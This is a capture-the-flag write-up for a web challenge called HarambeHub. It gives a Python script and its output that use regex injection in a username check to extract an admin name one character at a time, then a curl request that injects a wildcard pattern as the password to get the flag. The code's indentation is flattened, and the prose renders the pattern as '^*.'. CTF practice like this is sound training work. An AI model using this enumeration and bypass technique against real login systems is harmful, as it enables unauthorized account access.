ctfx [Web] - HarambeHub [100pts]


This site was created in honor of harambe: http://problems.ctfx.io:7003/
Problem author: omegablitz
HarambeHub.java
User.java

Two java files are given, analyzing both we can see that on the first file there is an “if condition” that is using string.match for username to check if it exists, knowning this we can get the admin username character by character with a python script by regex injecting.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

import requests
import string
#for x in "abcdefghijklmnopqrstuvxwyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789":
username = ''
lower_alpha = '[a-z]'
upper_alpha = '[A-Z]'
digits = '[0-9]'
special = '[^\w]'
regex_string = ''
d = {lower_alpha : string.ascii_lowercase, upper_alpha : string.ascii_uppercase, digits: string.digits, special: string.punctuation + string.whitespace}
regex = [lower_alpha, upper_alpha, digits, special]
char_found = True
regex_found = True
while regex_found:
regex_found = False
for r in regex:
while True:
a = requests.post('http://problems.ctfx.io:7003/users', data={'username': '^%s.*' % (regex_string+r), 'password': 'a', 'realname': 'a'})
if (a.status_code != 200):
#print a.text, r
continue
if ("FAILED: User with that name already exists!" in a.text):
regex_found = True
char_found = True
regex_string += r
for x in d[r]:
char_found = False
while True:
if (x in '\.[]{}()*+-?^$|'):
x = '\\' + x
a = requests.post('http://problems.ctfx.io:7003/users', data={'username': '^(%s).*' % (username+x), 'password': 'a', 'realname': 'a'})
if (a.status_code != 200):
#print a.text, x
continue
# print a.text, x
if ("FAILED: User with that name already exists!" in a.text):
username += x
char_found = True
print "The username: " + username
break
if char_found:
break
break
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

kinyabitch@Debian ~/h/c/c/web2> python a.py
The username: \[
The username: \[A
The username: \[Ad
The username: \[Adm
The username: \[Admi
The username: \[Admin
The username: \[Admin\]
The username: \[Admin\]
The username: \[Admin\] A
The username: \[Admin\] Ar
The username: \[Admin\] Arx
The username: \[Admin\] Arxe
The username: \[Admin\] Arxen
The username: \[Admin\] Arxeni
The username: \[Admin\] Arxenix
The username: \[Admin\] Arxenixi
The username: \[Admin\] Arxenixis
The username: \[Admin\] Arxenixisa
The username: \[Admin\] Arxenixisal
The username: \[Admin\] Arxenixisalo
The username: \[Admin\] Arxenixisalos
The username: \[Admin\] Arxenixisalose
The username: \[Admin\] Arxenixisaloser

One the second one we can see that is doing same thing but now with the password, so now we have the admin username we can just inject this regex “^*.” on the password and get the flag :)

1
2
3

kinyabitch@Debian /v/w/html> curl 'http://problems.ctfx.io:7003/name?username=\[Admin\]%20Arxenixisaloser&password=^.*'
ctf(h4r4mb3_d1dn1t_d13_4_th1s_f33ls_b4d)